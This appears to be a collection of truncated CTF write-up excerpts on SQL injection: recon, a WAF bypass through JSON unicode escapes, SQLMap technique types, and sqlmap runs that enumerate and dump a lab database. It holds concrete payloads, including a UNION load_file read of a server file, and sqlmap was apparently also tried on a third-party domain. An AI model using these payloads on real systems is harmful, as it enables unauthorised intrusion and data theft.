Hack the world

Take a look  With anticipation, I opened the website, which only had index.php, about.php, and donate.php pages. Frustration set in as I couldn't find any input fields to interact with.  AutoRecon Scan(can be ignored) Then I tried to do autorecon to see if we have more hidden files or vulns. only get dbconn.php, but it was a blank page. Source Code Checking  Determined, I delved into the source code and searched for 'post'. My excitement grew when I discovered that 'mail-list' was a parameter in a subscribe form. Burpsuite intercept I quickly opened Burp Suite, set up the proxy, and intercepted the subscribe form.   SQL Injection With precision, I copied the intercepted data and saved it as post.txt.

  Take a look Website Content Analysis: Accessed the website (http://192.168.139.47:80)   Website Content Analysis: Displays bakery goods and coffee products Static content only No interactive elements found: No search functionality No login forms No input fields Initial Assessment: Limited attack surface due to lack of user input fields Traditional injection techniques not immediately applicable Need to explore alternative entry points Further Website Exploration:  Located and clicked on alvida-eatery.org link within the main website http://www6.alvida-eatery.org/lander?template=ARROW_3&tdfs=0&s_token=1731789108.0467710000&uuid=1731789108.0467710000&term=Caterer%20Menu&term=Lunch%20Catering&term=Restaurant%20Table%20Reservations%20Online&searchbox=0&showDomain=0&backfill=0 Attempted SQLMap injection on URL parameters: Targeted 'uuid' parameter Result: 403 Forbidden error received  Initial Attack Attempts: Hint Analysis: Hin...

0x00 Problem 0x01 Check the Source Code We open the website and only see the source code on the website. As we can see, there is a WAF will filter some characters and words, that means the normal injection will not work. However, we can see, there is a json_decode() function will decode JSON data, that means the data can be accepted should be JSON format.  The example JSON format data is like: /u0074, /u0075. In addition, there is a "php://input",  accesses the read-only stream of the requested raw data, executing the data in the post request as PHP code. 0x02 Local Test We can launch an Apache server to test it. I copy the source code and make a little change to test this. This file is in /var/www/html. We will construct the data first. This time I use 'select' as an example. The word transfer to ASCII, then to hex, then replace the '\0x' as '\u00'. This can be test in the browser console. At the end, we can test it with curl . As we can see, the SQL...

Types of SQLMap: Boolean-based blind:  replaces or appends to the affected parameter in the HTTP request. Alternatively , the user can provide a string or regular expression to match on True pages. Time-based blind:   For each HTTP response, by making a comparison between the HTTP response time with the original request, the tool inference the output of the injected statement character by character.   Error-based:   This technique works only when the web application has been configured to disclose back-end database management system error messages. UNION query-based: UNION ALL SELECT, execute the for loop http://178.62.0.100:32104/portfolio.php?id=1 union all select 1,load_file("/var/www/html/administrat/panel.php),3--  Stacked queries : piggybacking.  it appends to the affected parameter in the HTTP request, a semi-colon ( ; ) followed by the SQL statement to be executed. Time-based blind injection:  How time-based blind injection works? The function ...

0x00 Problem: 0x01 Check the vulnerability We open the website, there is a login form, it might be SQL injection, LDAP injection or XSS.    Then we can check the source file to find if there is any vulnerability. Luckily we found a file named portfolio.php , and it has an id parameter.  I tried to open this file with id=1 in the web browser. It returns a picture and some words. Then I change id to other numbers, it also returns to different words. So it might have SQL injection vulnerability. 0x02 Find the database and table Here is my payload to check the database: sqlmap -u http://178.62.0.100:32104/portfolio.php?id=2 -dbs Below is the result:  The first red box shows it truly has SQL injection vulnerability and give us the test payload which we can exploit. The second red box shows the database we found. 0x03 Dump the data  Here is my payload, we choose freelance as our target database: sqlmap -u http://178.62.0.100:32104/portfolio.php?id=2 --dump -D freela...